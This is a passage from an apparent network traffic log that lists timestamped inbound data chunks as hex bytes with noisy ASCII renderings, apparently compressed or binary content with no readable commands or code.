0e 67 99 88 Data Ascii: Xyxj8Z0$<~Kwv-IHQ@MBwrU?LW>8!+w% z\X'%5 $*+]4NZb'0\}1A@ovRI#&^L2pE&(,Y;!8rN,A(9/an$)"(Gs_c+`{\_\|HXXdd8}!g
2021-10-02 16:13:23 UTC	56	IN	Data Raw: b0 fa a5 b7 47 ae 48 a5 65 a9 95 1a 7d 62 6c 8a 72 aa 2e 57 50 f4 ea b3 91 19 92 c5 36 15 59 2c fb 52 64 d2 d9 2d 42 61 60 c0 1e 59 77 3f 2e 4d 0b 70 74 ea 4f f8 6f 89 49 33 d4 ac 38 92 95 4b 12 ce a5 78 bb 07 50 7b 40 3b 6f 78 e3 57 68 de c7 dc 68 ec a7 1d a6 f8 bf 4d a5 53 29 12 6a 99 5a 83 4f af b9 3d aa e5 1e a7 5b a1 56 e1 e6 0c d5 5c ad c4 4d ab 72 de 8e 9c d3 44 9f 96 a8 8d d3 d7 48 7f 2f 66 ba 44 86 df 12 bd 2a 33 1d 55 dd 79 d9 6d c8 c4 1c 79 6f a3 bf 07 e4 63 dd 36 6b 6b 6e 4d a9 94 4d d9 89 76 94 00 67 14 9c 48 4b 8c 89 14 1a 8e 63 bc ea ad 4d 90 a6 2b 0d ac 3b 09 c8 b0 78 bf 3a 72 6a eb f4 a4 52 de 73 31 45 61 ba f6 77 79 08 90 27 57 24 21 0d c4 a6 e5 c6 23 3e d4 59 6d d2 27 98 ed a9 cd 63 66 bc 81 d2 3a 99 81 29 38 5d 2e 3e a1 88 12 32 cc 66 Data Ascii: GHe}blr.WP6Y,Rd-Ba`Yw?.MptOoI38KxP{@;oxWhhMS)jZO=[V\MrDH/fD*3Uymyoc6kknMMvgHKcM+;x:rjRs1Eawy'W$!#>Ym'cf:)8].>2f
2021-10-02 16:13:23 UTC	57	IN	Data Raw: 71 f6 bc 63 6b 3a 3d 9d 61 93 fb 9b 1a e6 19 09 9a 11 2e 4c c7 52 91 88 0c 4e bc 88 c4 5c 56 9e 11 f5 2a 3f f5 06 b9 2c 97 4d db 3b 6f 6e 95 49 12 ed b2 25 ae db 77 2a 52 f1 15 2c 34 d9 c8 52 e5 25 2c ec 12 14 5c 07 35 a4 58 2b b4 24 b5 26 b9 96 2b 4d a6 7d 32 35 4e a3 01 f5 45 79 6e 3d 15 e8 72 66 42 79 f6 4a 2c a4 96 56 c3 c5 48 59 36 5b 24 04 ea e9 89 73 5e 7b 41 b1 d3 e4 7e e6 cf 34 58 97 85 60 84 a8 cb 63 ae 22 30 b8 ab ee f1 31 f4 86 d9 5c 7d 0f fe a9 b6 42 55 e5 71 5f f7 5a af e9 b7 7c ab 45 d9 6a 98 a1 64 b6 cb 9d 36 50 5a 2c f3 25 1c 22 6e 22 58 94 19 89 62 ef 1a 35 c5 ee 0c 3b 97 65 b9 52 a5 27 d3 29 32 94 eb 8c cc 43 5c c5 b6 80 54 b0 d2 df aa 3c b4 a1 48 b8 62 ec b0 b2 34 26 c8 3b 5b e9 2b 97 68 45 f5 62 97 6b 96 65 90 b0 13 81 05 38 82 99 dc Data Ascii: qck:=a.LRN\V?,M;onI%wR,4R%,\5X+$&+M}25NEyn=rfByJ,VHY6[$s^{A~4X`c"01\}BUq_Z\|Ejd6PZ,%"n"Xb5;eR')2C\T<Hb4&;[+hEbke8
2021-10-02 16:13:23 UTC	60	IN	Data Raw: a8 c4 a4 d3 a7 55 a7 fa 4f a0 d3 61 bf 3a 62 61 44 7e a1 39 d6 63 b6 5c 31 69 f4 e8 a9 54 9a 95 4e 62 c2 21 d2 e9 d1 d2 5f a8 54 64 45 86 c8 2e be 80 53 a8 c4 40 dc 07 b7 de 9a c5 53 ad 68 b0 48 36 e9 e3 ad 91 66 0a 5c d4 9c 80 57 d0 e6 b9 53 3f 58 e0 47 12 ff 00 10 3c c1 c0 ac db 99 33 8f 08 e8 a8 99 da 53 3c f1 76 a1 3f 8e 75 5c dd c2 fc ab 9f f2 9e 46 cb 1c 31 a5 b5 95 f8 5b c1 2e 1d cb 6a a9 3e b1 53 cb d9 59 15 4a b3 f9 d7 31 52 67 51 1f 99 9f a8 ef d6 e1 2f f2 4a 9c 24 23 6b 67 ba 45 a7 08 b4 4c 3f b7 0d 86 5c af ac 9d 71 6e 04 d4 77 53 58 f1 8b e7 66 ad 9b 77 78 4d b7 df 33 e6 59 2e 25 ca 29 b0 c9 b2 93 d6 9c 6a 29 26 66 4e 95 4b 60 00 00 04 b1 73 57 e4 b6 4b ed 0f c7 0c 81 9d 6a fc 41 e1 b7 18 33 55 0f 3c 66 9a a4 ac cb 55 ae 64 4c f7 98 32 36 69 Data Ascii: UOa:baD~9c\1iTNb!_TdE.S@ShH6f\WS?XG<3S<v?u\F1[.j>SYJ1RgQ/J$#kgEL?\qnwSXfwxM3Y.%)j)&fNK`sWKjA3U<fUdL26i
2021-10-02 16:13:23 UTC	61	IN	Data Raw: a8 c6 73 28 4d 65 4b a8 cf 71 ef 47 ca f4 57 1c 69 d5 28 34 b6 94 88 a5 05 ce 4a db 4d d0 06 0d 04 62 d3 1e 2c c6 8d 3a 9b 29 88 c6 8b 22 25 46 04 88 52 53 1e 91 4f ac d2 e8 50 a6 c4 75 13 d0 85 cb cc d5 d2 f3 2b 40 ba 52 c8 53 ea 3a 12 85 9d 62 d0 99 88 c2 bc bb 7e 2a 48 0f ce b4 fb 45 33 a4 22 d1 2e 6d 9e 7b 19 16 89 66 4a d2 40 20 85 02 14 08 23 fd a7 ed b8 75 23 f1 2c a6 53 3b 45 76 62 ec d3 db 72 83 4e 8d 16 af 5c a1 45 ca 1c 40 30 1a 0c 25 55 75 c9 ac 40 ad 36 fd 2a 03 f3 e1 51 1c a6 f1 07 2e e6 c9 0d 31 29 ea 6b aa a1 66 bc ac 63 40 4b 2e 25 0d f0 1b 3a 57 75 df 37 95 d3 35 c4 99 d3 0d a2 4b d2 ab 5d 5b ff 00 b4 ef f0 8f 9e fa 28 b4 5a 36 67 6d 76 bb a3 eb 5c 93 26 c2 bb 65 a2 f4 b9 f4 4a e5 ac a6 61 60 59 e8 b7 0d bb 2d 63 84 6a 36 59 20 10 94 92 Data Ascii: s(MeKqGWi(4JMb,:)"%FRSOPu+@RS:b~HE3".m{fJ@ #u#,S;EvbrN\E@0%Uu@6Q.1)kfc@K.%:Wu75K][(Z6gmv\&eJa`Y-cj6Y
2021-10-02 16:13:23 UTC	62	IN	Data Raw: 73 01 90 68 6d 22 f7 b6 08 a6 b8 8b 66 49 f5 87 27 62 47 81 c1 16 8a 0a 9c b3 30 02 ea 3b da c3 f9 c0 c4 e4 1e 14 29 24 9c 83 6f 21 eb e9 09 43 4e e0 5a e7 a8 27 f6 c0 46 a4 77 91 0e 15 b8 f8 18 0d c9 eb bf 8e 24 07 20 6f 8a 97 9f 77 b9 87 50 20 ee 6f 80 86 2d 09 14 a7 f5 5f bb 7f 99 1f 4c 36 31 fe d1 f3 ba 2e 5f d2 7b bd 61 62 01 0e 49 0e 0b c5 39 d0 42 c3 e3 4e 12 02 45 78 0e ee e7 ef 86 ea ce 2c f4 e2 d9 f9 98 70 77 24 fa d7 e9 dd 6f 87 8f cb 15 45 84 a5 22 a0 17 a5 6a 77 fa d4 fe 60 d2 53 7e 96 f3 b9 c1 08 09 51 cd bb e0 54 b5 5c 80 45 ba 7d ed ef eb ef ef c5 c8 96 82 c5 4b 6d 48 71 97 1e 1a 17 a1 ca 1e 81 9e a7 21 bd f7 c0 ea 5f 4d 8f 7f 4b 77 fb 0f bb 0b 30 20 7d 25 f7 b1 1c 77 77 45 73 25 85 0c be 72 f5 f8 61 62 b8 57 23 22 d0 b0 45 81 25 41 f1 1a Data Ascii: shm"fI'bG0;)$o!CNZ'Fw$ owP o-_L61._{abI9BNEx,pw$oE"jw`S~QT\E}KmHq!_MKw0 }%wwEs%rabW#"E%A
2021-10-02 16:13:23 UTC	65	IN	Data Raw: c0 27 17 02 45 75 cb 75 1e 3d c8 61 ed 14 94 86 56 12 ca 70 e0 54 8a 96 d3 c5 a0 92 e9 15 16 67 bf 26 14 26 28 f5 3c 93 25 52 19 40 34 7c 88 6a f4 97 29 af d2 b2 93 4d 48 64 55 b3 58 44 78 ae 09 9a 1c 65 12 e9 c9 0a 2e 2f 98 cc ab 00 74 24 90 f5 35 23 df 58 96 00 02 f9 f3 3e 64 c5 88 c5 8f e8 08 a7 bd 4c 94 f1 39 69 89 cf 65 79 b3 92 dd 4a a3 f9 26 6b 94 f3 99 93 3e d6 43 71 95 15 af 47 53 c2 2d 2c 86 f4 b4 d4 36 da 8f 21 56 06 5f 4d 20 8a ea 84 8e 73 93 df 5d 4d 99 2e f3 78 8f 4a 8f 5f 66 39 2e bf e9 0d 33 3a 3d 2b 86 d4 36 5d 70 16 9e 70 96 57 56 53 4b 01 35 0f 51 7a 0d da 19 aa 33 df 04 48 dc 76 df 9b 22 1c 58 0a 44 37 6a 48 9d 22 80 99 ce ab 43 15 3c 92 b0 6b 7c 49 cc 04 3a 16 87 56 93 2a 55 1d a7 50 b7 5b fc e2 3a 52 ea de 64 03 3c e0 8a 38 ef 25 6e Data Ascii: 'Euu=aVpTg&&(<%R@4\|j)MHdUXDxe./t$5#X>dL9ieyJ&k>CqGS-,6!V_M s]M.xJ_f9.3:=+6]ppWVSK5Qz3Hv"XD7jH"C<k\|I:V*UP[:Rd<8%n
2021-10-02 16:13:23 UTC	66	IN	Data Raw: 70 fe e0 84 75 03 7e 60 b7 86 de 1e 18 88 20 89 b1 dc ef 6f d5 6e 82 fe 18 20 88 ee 4f 53 7c 5e c3 70 f0 10 42 c5 6a 4b 57 4f 48 64 a9 8f af ce 10 c4 da fb 02 2d bf 4b fe df ce 12 1d 43 1d 41 6e 0d 47 f6 86 0a 0a e9 dd 81 c8 c8 b4 21 40 4e 5a f0 6c a1 c9 b0 be 08 58 8c aa f7 dc db c2 c3 f7 be 18 24 90 e3 e3 41 01 81 24 a4 d7 c3 de 08 58 75 af 10 67 7c be 73 82 16 2a 82 21 59 1d 6f d3 6d ff 00 7f 66 24 2f 09 6e ff 00 87 ba 0e 3a 44 65 43 da 3c 47 43 ec c5 fc 74 88 04 12 46 ef b9 f9 df 02 57 b8 22 fb 5f cb 18 f1 31 1a d6 6e 36 eb b7 75 fe 63 cf 6c 32 52 4f 21 df 97 08 38 fa c3 03 7e e3 ef 18 b8 53 2a 72 a4 4e 25 1a 10 13 cb 5e 70 80 03 a7 53 d7 c3 f7 fe 30 aa 4e 2e 11 38 8a 4b 02 e3 ca 1f 14 90 f4 30 b8 7f 93 1e 7e 5c a0 55 6d c1 20 1b 77 9b 75 e9 f1 ee f9 Data Ascii: pu~` on OS\|^pBjKWOHd-KCAnG!@NZlX$A$Xug\|s!Yomf$/n:DeC<GCtFW"_1n6ucl2RO!8~SrN%^pS0N.8K0~\Um wu
2021-10-02 16:13:23 UTC	71	IN	Data Raw: bd 23 34 e6 16 33 dd 57 80 19 a6 81 5e a5 33 34 c7 cb 15 9a 05 12 81 46 a2 1a 04 a9 53 d8 ce f5 8c fb 16 50 8b 97 9a a9 c3 a5 71 03 86 94 ea 44 48 b0 aa b4 cc bf 47 dd 5c f6 fb 55 89 6a 91 78 4c 60 08 01 4a 60 d5 a9 34 a8 a5 5f 43 be 3d 3f a3 dd a8 bd ec cb 5a 36 b8 cd bb 31 4b 44 ab 35 92 d6 99 68 5c c9 80 b1 54 cc 49 c7 84 e1 26 87 bd c9 8e 30 d5 f2 bd 5a 9c e9 a2 55 4a 97 25 c6 e3 3e cd 03 3d 50 e4 d3 ea e9 89 58 a7 40 a8 41 a8 72 66 c1 44 c5 29 54 89 d4 aa 8a 24 c1 8e ea 65 33 11 4f b2 b7 13 16 98 5e ec 93 3e 5c e5 20 d9 d4 99 8e 2a 5c 55 b3 d7 f1 41 46 8f 70 97 6a b2 da 25 cc 9f 2a 6c b1 26 62 40 90 a4 11 34 12 ec 73 24 39 f1 1a 64 d1 8c cc 66 6c 02 eb 4b a6 d4 a9 25 b5 04 3a db cc 37 98 29 4a aa a9 c9 4e 32 86 90 a5 15 53 db 12 99 ab 42 8f 77 61 c1 Data Ascii: #43W^34FSPqDHG\UjxL`J`4_C=?Z61KD5h\TI&0ZUJ%>=PX@ArfD)T$e3O^>\ \UAFpj%l&b@4s$9dflK%:7)JN2SBwa
2021-10-02 16:13:23 UTC	73	IN	Data Raw: fa e0 88 29 07 31 04 34 f5 1d fb 9d ff 00 71 7c 11 31 d1 6e c0 8d b7 97 bf ef fb 89 b2 e9 e5 e8 d9 3b 83 75 d6 23 cb 7d d5 b1 4f 6a a1 58 71 08 65 b9 ae 25 0a fe 94 86 22 c8 65 a4 24 a5 6f c9 e4 b0 93 75 e3 91 da ac 73 bf d3 6c 32 d5 5b 4d b1 38 d0 ce e8 18 75 22 99 1c 88 e7 1e 39 d2 c4 89 d7 9a b6 56 e6 90 ba da af eb 3c e9 92 99 c9 4c 86 50 5d 0b 80 1c e4 34 8d 57 a7 8e 72 52 a5 ae 49 79 c7 d4 a5 17 94 b7 12 e3 8a 58 59 2a 60 d5 1d 2d 92 a5 b8 9f 52 2b bf ed 3a 35 24 e3 ad 28 28 97 66 97 2d 92 89 72 f0 10 c3 34 d3 50 fb b5 19 78 fb 15 9a 57 56 99 69 c2 d8 52 10 7f fb 3b 07 93 9f 99 c7 71 ff 00 0a 3f c3 5e 67 6a 0c cd 0b 8c 5c 56 a7 18 bd 9e f2 3d 71 b6 aa 11 ae e4 49 3c 51 cc b0 d2 dc a1 95 69 8a 66 3b 21 ca 1c 37 1d 64 e6 ba c8 65 82 98 cf 0a 4c 67 dd Data Ascii: )14q\|1n;u#}OjXqe%"e$ousl2[M8u"9V<LP]4WrRIyXY*`-R+:5$((f-r4PxWViR;q?^gj\V=qI<Qif;!7deLg
2021-10-02 16:13:23 UTC	75	IN	Data Raw: 9a f9 a5 3a b9 08 2e 3a ae c2 ee b0 4a b2 24 f5 69 20 cc ed 2c b0 c4 54 45 4e 2c d8 9d 32 dd a4 70 fb 2f 70 cb ba e5 cc b4 cf 97 d7 5e 16 a9 93 2d 13 6d 6b 0d 37 14 d3 88 4b 70 3e 89 54 4a 5c d4 00 f5 8d 42 a8 d4 23 ca 71 b4 c9 76 95 53 92 d3 ce 45 61 8a cc 45 e5 fc c3 1a 24 55 3a e0 4b 8a 62 3a 9f 75 24 a9 4d 03 16 3d 3e 33 cf 00 a5 05 12 31 b5 40 29 49 43 b8 3c 06 f7 7e 7f 2b 1d 4c c3 35 53 17 33 12 b1 ac ba 94 97 4f 92 68 77 72 e3 16 09 b3 64 21 f7 77 ae 52 60 b6 eb 12 27 33 52 65 cc e3 42 8d 29 d6 da 5c 57 d6 b5 4a 90 f8 69 0e a1 0a 3a e7 c3 5a 56 18 92 db 68 0c cb 6a 52 09 68 0c 59 ca 72 56 a2 8d 46 df 09 30 99 89 09 5a 43 0d 2a 41 a5 49 7c c9 d4 e7 96 94 8b 4a 5c 6d 41 2b 8d 0e 24 97 11 25 e5 fa 66 5c ae b7 06 a5 22 43 49 4d 58 b4 f4 2f 48 66 32 95 Data Ascii: :.:J$i ,TEN,2p/p^-mk7Kp>TJ\B#qvSEaE$U:Kb:u$M=>31@)IC<~+L5S3Ohwrd!wR`'3ReB)\WJi:ZVhjRhYrVF0ZC*AI\|J\mA+$%f\"CIMX/Hf2
2021-10-02 16:13:23 UTC	76	IN	Data Raw: a7 92 a4 0f 8c ee a3 f8 52 18 24 e2 2a 24 75 42 5e 22 a1 55 05 7f b5 9d 9b 9f 3e 11 ef bd 93 b8 39 13 8e bc 79 e1 df 0e 67 02 de 56 a7 54 63 e7 1c f3 1e 32 45 5e 95 4c a0 e5 27 eb f5 0a db 79 81 4e be d2 f3 3e 69 ab 36 88 b4 2a 7d 22 2a d2 94 c9 ab 33 16 2a 1e 90 f8 67 1a cb fa d8 89 17 7c de d3 4c 98 d2 e5 e1 35 2a d5 8e 7a 86 8f 36 e9 63 69 a7 6c ae c1 5e d7 95 92 62 d3 79 da 24 2a c7 75 d9 d0 00 99 3a d7 6d 22 cf 28 02 6a c3 11 52 82 6a c3 20 48 8c 67 b6 07 14 a4 f1 c7 8d d9 f3 33 d3 f9 ce 53 9e a9 27 2d e5 06 d9 43 aa 6d 39 77 2e 39 f9 5d 0d 74 aa 62 e2 c6 44 4a 55 56 54 77 73 0c 08 50 e2 b2 aa 5c aa ea e0 86 d4 52 a2 ac 7b a6 c8 24 58 24 f5 af 8a 60 eb 6d 0a 53 03 d5 a9 c9 07 76 10 d9 d5 f3 d4 c4 74 5b b2 e9 d9 2d 80 ba ae db 5c e9 08 b4 cf b2 cb bc Data Ascii: R$$uB^"U>9ygVTc2E^L'yN>i6}"3g\|L5z6cil^by$u:m"(jRj Hg3S'-Cm9w.9]tbDJUVTwsP\R{$X$`mSvt[-\
2021-10-02 16:13:23 UTC	80	IN	Data Raw: 31 e1 0a a4 b5 74 78 58 53 52 4e f8 b0 55 04 be 49 f6 6a 44 6b 51 49 b0 17 db ef bc 60 8a 61 04 84 5c fe c2 dd f8 22 e5 fd 27 bb d4 43 93 a9 17 1d 0d bf 7c 11 4c 32 4d 92 4f 9f d3 04 32 52 fa d2 23 b9 1d 3f 72 3f 83 87 4a 82 5d c1 7a 33 79 c5 8a 4b 80 d9 87 e5 dd 0b 0a 59 cb 65 14 3b 16 62 0f c7 85 88 89 85 86 09 24 3f ac 10 c0 a8 ec 45 87 b6 f8 58 22 25 fe af 60 b7 f3 8b 91 f4 8e ff 00 53 12 e7 27 89 ad a5 20 f9 1f 97 5c 22 f3 ee f7 31 0e 4e 65 e0 75 81 d0 ef ef 18 48 22 2b dc 92 7b ef f3 07 04 4a 4b 10 60 d2 bd 20 01 7f 8d b0 1a be f3 be 09 87 18 23 81 1e 22 34 9f f1 15 ce 72 f2 5f 64 2e 27 cd 87 2a 74 19 99 85 79 7f 24 b5 26 0c 66 25 39 e8 79 aa ac d4 1a dc 57 1b 90 db ba 59 a8 50 11 56 80 e3 b1 a3 bf 31 09 92 04 64 25 44 b8 8c ab be 5b da a5 92 1c 25 Data Ascii: 1txXSRNUIjDkQI`a\"'C\|L2MO2R#?r?J]z3yKYe;b$?EX"%`S' \"1NeuH"+{JK` #"4r_d.'*ty$&f%9yWYPV1d%D[%
2021-10-02 16:13:23 UTC	83	IN	Data Raw: 06 5d 31 dc c9 49 64 38 1a 73 2d e7 08 ee af 2d 70 ea 98 b4 43 e5 38 51 36 23 92 6a ec b4 db 72 54 64 38 89 0a 48 94 d4 76 4f 69 9b 5d fc 22 b5 10 4b 8a 7c a7 94 1d 55 2e d3 23 4e 6b d1 21 40 76 82 de 71 5b 54 d5 a9 d9 b9 7b 2a 21 8a ad 2a b7 0e 55 62 4a 84 d1 5d ce 12 39 81 86 22 48 2f e8 7d 71 16 fb 51 1c 43 8f a2 48 6a 44 45 24 c4 7a f5 b8 bc b9 52 8c b4 e6 c9 f2 69 f2 cb 10 eb 75 d8 97 a3 d7 da a9 e6 ba 96 88 e2 91 41 e5 25 72 e3 d2 e3 3a db c5 49 2c 06 b5 c9 e5 39 1d ef e3 ee 04 11 1c c9 89 0f 54 1e 6d e7 9d 61 63 30 32 dc ba 64 65 43 7a 72 05 4a 8b 59 14 dc 96 d0 71 df c9 e8 71 81 e7 2a b4 e3 4d b8 fc 45 ba ea 96 90 6e ca 02 2a 4f 64 15 60 75 64 08 d4 b5 40 fe e2 65 a4 09 81 29 c6 52 a3 d6 4f 24 80 80 00 24 8e d1 fe 20 02 58 64 e4 47 4c 73 1a 69 dd Data Ascii: ]1Id8s--pC8Q6#jrTd8HvOi]"K\|U.#Nk!@vq[T{!UbJ]9"H/}qQCHjDE$zRiuA%r:I,9Tmac02deCzrJYqqMEnOd`ud@e)RO$$ XdGLsi
2021-10-02 16:13:23 UTC	84	IN	Data Raw: 80 5c 03 93 e9 0b 04 4c 31 36 17 c1 04 22 ad 20 1f 1b 5b bb a8 bf ed 82 18 a0 80 f4 81 e6 5f ad ff 00 7c 10 b1 19 dc 93 e7 82 19 29 c5 a8 1c e1 86 fd 48 1f fa 8d b0 43 14 a9 3f c9 f9 15 1f 41 0b 04 2a fe a3 dd e8 21 60 85 67 a6 4f 4f 18 58 21 ba ac 3f 49 c5 f3 8c 2c 11 38 d5 b8 7c ef 85 82 0c 67 87 9f de 11 17 d8 e0 88 c4 e4 13 a3 7a c2 c2 2d d8 30 7a e9 f3 9c 59 8d 3b fc 8f da 21 3b 92 a1 dd 6d fe 58 64 bb 57 38 ad 64 13 4d df 78 49 55 bb ae 7c 6f 89 85 89 14 01 07 c8 1b 60 8b 5d 7b 87 ce f8 87 04 4e 31 40 4d 45 19 8d 21 60 8a cb 62 dc 21 60 87 c4 90 29 e1 5f b4 2c 11 51 24 9a e5 bf d8 7c fc ac 10 c0 29 a9 91 e5 09 5e af ea da fe ff 00 db 04 43 11 52 22 35 9b 80 05 f7 3e 07 7f 97 b3 0d 81 5b bc c7 de 2d 50 70 40 81 f5 80 03 a0 ee 1b 7f 9c 2c 53 94 3a 37 Data Ascii: \L16" [_\|)HC?A*!`gOOX!?I,8\|gz-0zY;!;mXdW8dMxIU\|o`]{N1@ME!`b!`)_,Q$\|)^CR"5>[-Pp@,S:7
2021-10-02 16:13:23 UTC	85	IN	Data Raw: 2d e5 b2 fd 22 da 6d 2b 93 67 b3 dd b7 c4 d9 f2 ec b6 7b 3c e2 24 f6 a5 cb c7 33 a8 08 4c b9 6a 01 2c 4a 1f 12 8d 4d 23 91 b5 87 1c 7d 35 99 05 e9 55 33 51 97 9a e9 52 6a 31 75 8a f6 73 98 a6 61 66 7a 45 23 2f a0 09 69 83 94 28 d2 63 b6 fc a9 4d 48 67 53 1e 98 a6 d2 db 8a 52 d1 d5 ba 14 a5 a5 c1 21 8a 85 46 61 c6 9e 1a 72 8f 6c 29 09 00 0a 84 ba 5d 8b 53 89 1a ee cd c1 e7 07 50 7b 98 fc f7 a3 cb 62 25 dc ad d2 64 c8 a6 b6 a2 c6 5f 46 69 cb 88 ad c6 c9 b9 42 07 34 8a 8d 59 e9 ec 49 8b 54 a8 b5 11 6b 5c 87 18 2d 3c d0 71 b6 55 24 84 82 4d 00 f9 a4 44 0b ac a9 08 5c 57 e1 b5 4f 11 1b 5c e4 37 20 73 60 e5 88 99 af 26 dc d5 b3 4a 9c 65 2f d7 73 84 97 20 b6 f4 48 ab 79 5c aa 83 09 6d 6e 14 2d a2 85 24 aa a9 a8 3a ef 7e 75 82 2d 05 02 79 6d b4 b2 5d fc dd 2d 54 Data Ascii: -"m+g{<$3Lj,JM#}5U3QRj1usafzE#/i(cMHgSR!Farl)]SP{b%d_FiB4YITk\-<qU$MD\WO\7 s`&Je/s Hy\mn-$:~u-ym]-T
2021-10-02 16:13:23 UTC	87	IN	Data Raw: 64 8d cd bb c9 3e 3e 17 b0 f2 c3 10 0e 70 42 0b 0a 49 17 b9 fe 36 f2 c0 00 19 44 02 0e 45 fe 7c f8 20 12 48 2a 27 ff 00 e3 e1 d4 77 7b 3c b0 8b 20 d0 17 20 d4 6a fa 44 b0 ce 95 e6 fe 90 44 df 72 7c bb bf 6c 56 cd 9c 10 d8 22 49 25 9f 48 62 40 ea 71 61 4a 0a 33 cf 81 f9 dc 39 c0 85 0c 42 a3 5f 48 85 d3 65 0e e0 41 bd ad 7d be f6 c6 3e 16 50 6c 9c 77 57 e7 bc 4a b1 1a 80 48 71 ad 00 76 76 fc 38 78 8a e2 c7 75 5f ba e4 ff 00 1f ce 2c 85 88 fc f0 40 c0 d0 e5 0b 04 0c 05 06 50 b0 41 00 be 9e d3 82 08 72 09 48 1d e0 0f 96 df b6 08 b1 4a 04 10 0f ae f8 88 82 3a e0 8a e1 b0 44 82 46 51 12 d9 0b 55 ca 88 db c4 ff 00 1f 7e ec 10 15 13 9f 38 97 04 4a fe a3 dd e8 21 60 87 42 1e bb aa 3b a1 60 87 85 82 28 39 9e 67 d6 01 64 8e 9d f7 c1 11 0c 95 1b db af b7 af 4c 10 44 Data Ascii: d>>pBI6DE\| H*'w{< jDDr\|lV"I%Hb@qaJ39B_HeA}>PlwWJHqvv8xu_,@PArHJ:DFQU~8J!`B;`(9gdLD
2021-10-02 16:13:23 UTC	88	IN	Data Raw: da 48 63 2a 7a 53 51 40 ec 5c eb 92 69 c4 ee cf 3b a4 0b 38 b3 ff 00 c3 97 ba 17 25 26 c3 7b 4b 93 39 33 d6 50 a5 1b 46 14 25 29 a8 63 89 0e a1 9b 64 41 62 39 d5 4d 79 06 0d 36 a7 52 53 9e 8e ba 76 53 89 59 96 94 88 f2 a3 36 99 12 b2 9c ec a1 95 54 e3 72 56 d5 6a 5d 35 c8 ce 55 dc 65 3c d8 b2 24 a9 52 93 1d 22 2d b6 b8 12 09 58 62 66 22 5a 8b 31 d0 ea 0e 95 19 6f 76 8e ee 51 eb 92 95 ba f0 99 48 21 d4 0c a2 55 53 87 57 a8 62 f4 ce af 15 ac ba 88 8d 53 f9 b2 84 49 59 7a 2d 20 4d 4a 43 6e d2 72 3c 6a 45 6a 46 5e 99 0e 82 e0 76 53 75 5c dd 36 3b ad bb 35 d5 a4 b6 c3 8e ca 0d 2d c6 4d 9f 82 9c 40 a7 78 d2 21 41 8b 02 fe 71 44 c0 91 4f fc b7 9b 1d ba 5b f4 21 41 98 a8 f3 16 d2 d1 95 97 45 cd 13 69 4f d6 b3 3f 29 c8 8a ae 66 45 a6 63 8e c3 a6 2c bb 21 b8 e5 de Data Ascii: Hc*zSQ@\i;8%&{K93PF%)cdAb9My6RSvSY6TrVj]5Ue<$R"-Xbf"Z1ovQH!USWbSIYz- MJCnr<jEjF^vSu\6;5-M@x!AqDO[!AEiO?)fEc,!
2021-10-02 16:13:23 UTC	89	IN	Data Raw: ad ef d3 ad 88 db db 8b d2 9c 40 0e 67 c1 e2 a0 0e 3c b5 3f 3e 6f 88 5e fd 49 ff 00 d2 af d8 e2 b5 0c 25 a2 e0 a2 03 68 5c 78 fe 6b 10 a5 21 57 bf 75 b0 b0 b0 38 20 85 82 08 58 20 86 22 f6 f6 df e1 82 08 8a f6 51 3e 67 04 0d 08 a8 ab af 76 08 22 35 02 6d 63 6f 79 18 20 84 49 48 1e 3b 0f 96 08 20 b1 6a 65 93 bf 7d 3f 3a f0 82 11 dc 11 e3 8a db 09 ae 8c 61 d2 bc 20 ee 63 f3 5f 9b e1 80 b0 b6 19 6b 2b f9 e1 ca 19 2a c5 f3 38 7c 24 56 73 3c cf ac 06 bd 81 b7 5b fc b0 43 a5 00 80 6b 00 57 72 76 ff 00 6d be 38 b1 3f 4a bb fd 22 4c ba 38 7f Data Ascii: @g<?>o^I%h\xk!Wu8 X "Q>gv"5mcoy IH; je}?:a c_k+*8\|$Vs<[CkWrvm8?J"L8
2021-10-02 16:13:23 UTC	89	IN	Data Raw: 6e 5a 40 e2 85 ab 0b 71 3e d1 42 95 86 bb e9 9b 42 c3 a5 59 11 f3 84 30 a8 71 f3 4f 58 00 bb ab 4d bd ff 00 1f a6 2d 9a 30 a4 28 eb e9 f2 b1 72 3e 91 df ea 62 54 8d 47 08 94 e2 f2 ef e5 f3 74 0b fa 4f 77 a8 81 3b 2a de dd fd 98 14 9c 39 f1 f2 88 49 0a 0d c3 e1 84 36 f9 fc cd f0 80 b8 78 ac 86 24 42 c4 c0 33 1c c7 ac 2c 11 62 f2 ef f6 30 b0 45 63 31 cc 40 92 45 ad de 6d d0 fd 7e 58 ad 68 c5 f3 c1 a1 fa b6 51 5e 99 eb fd 52 03 5e f7 b7 75 be 78 10 8c 3e df 7e f8 85 af 17 df 7f 75 21 ff 00 58 bf 4b 5f cf c3 d9 8b 22 10 86 38 b7 d6 a7 c1 b9 44 64 6e 47 81 fd 8e 00 5a a2 2c 52 c8 0d df f3 fb 85 87 52 b1 01 c1 fe 3c 53 0b 6e f3 a4 78 f8 62 b2 1c 34 5a 26 51 8f f6 72 f9 58 5f fa 4d fc 0f f8 f3 c2 84 01 5a fc ee 88 52 82 92 46 ff 00 9c a1 7a c7 f5 1b fc 7f 9c 0b Data Ascii: nZ@q>BBY0qOXM-0(r>bTGtOw;*9I6x$B3,b0Ec1@Em~XhQ^R^ux>~u!XK_"8DdnGZ,RR<Snxb4Z&QrX_MZRFz
2021-10-02 16:13:23 UTC	91	IN	Data Raw: eb 95 a2 eb 52 96 ee 62 a8 c8 84 e7 e5 6c ad d2 e4 65 32 fa 03 77 66 c3 6b 8f 0a 0f 23 c3 8e 7c e3 71 14 92 a6 ac 33 24 a5 0c 2d a7 da cc 55 78 b1 2a 6e 2a a0 c3 2b aa 51 29 f5 d6 b3 66 61 53 68 72 43 f5 17 65 47 71 54 38 0e 46 6d 71 1f 6d b4 16 34 b4 12 a4 4a b1 d7 7d 33 7f 38 23 38 c8 39 46 77 13 78 83 92 f8 79 49 f4 87 6b 5c 40 ce 94 fa 05 3a 3c c7 a0 b5 22 4c dc cf 5e cb b3 e2 66 7a d4 d5 bb 1d a6 19 61 33 dd a9 53 29 4f b6 e4 64 30 ca e4 3c 86 14 b5 e3 0e d9 3d 16 2b 24 fb 51 2d 32 52 55 2c 16 1a 82 05 0d 33 23 3c e3 49 b4 d7 c5 97 67 b6 7a fc bd ad 07 fc 57 7d d9 6b b5 4b 2f 9c f4 59 e6 04 07 39 39 53 70 e2 d1 b7 ff 00 88 d7 10 a0 57 7b 41 4f e1 a5 0d e9 68 c9 bd 9e 28 d4 5e 0c 50 d8 aa c2 a4 26 a5 1a 0e 4a 80 88 73 21 66 c8 b4 66 a1 a1 ca 8d 0e 73 Data Ascii: 